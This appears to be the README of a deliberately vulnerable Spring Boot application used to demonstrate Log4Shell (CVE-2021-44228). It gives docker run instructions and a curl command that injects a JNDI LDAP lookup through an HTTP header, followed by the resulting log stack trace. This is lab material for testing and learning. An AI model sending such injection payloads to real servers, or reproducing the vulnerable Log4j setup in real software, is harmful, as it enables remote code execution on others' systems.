51 lines
1.9 KiB
Markdown
51 lines
1.9 KiB
Markdown
# Log4Shell sample vulnerable application (CVE-2021-44228)
|
|
|
|
This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).
|
|
|
|
It uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and the JDK 8u191.
|
|
|
|

|
|
|
|
## Running the application
|
|
|
|
Run it:
|
|
|
|
```
|
|
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
|
|
```
|
|
|
|
Build it yourself (you don't need any Java-related tooling):
|
|
|
|
```
|
|
docker build . -t vulnerable-app
|
|
docker run -p 8080:8080 vulnerable-app
|
|
```
|
|
|
|
## Exploitation
|
|
|
|
You can confirm the application is vulnerable by running:
|
|
|
|
```
|
|
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
|
|
```
|
|
|
|
You will see the following stack trace in the application logs:
|
|
|
|
```
|
|
2021-12-10 12:43:13,416 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
|
|
at com.sun.jndi.ldap.Connection.<init>(Connection.java:238)
|
|
at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
|
|
at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
|
|
at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2749)
|
|
at com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:319)
|
|
at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
|
|
at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
|
|
at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)
|
|
at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
|
|
at javax.naming.InitialContext.lookup(InitialContext.java:417)
|
|
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
|
|
```
|
|
|
|
## Reference
|
|
|
|
https://www.lunasec.io/docs/blog/log4j-zero-day/ |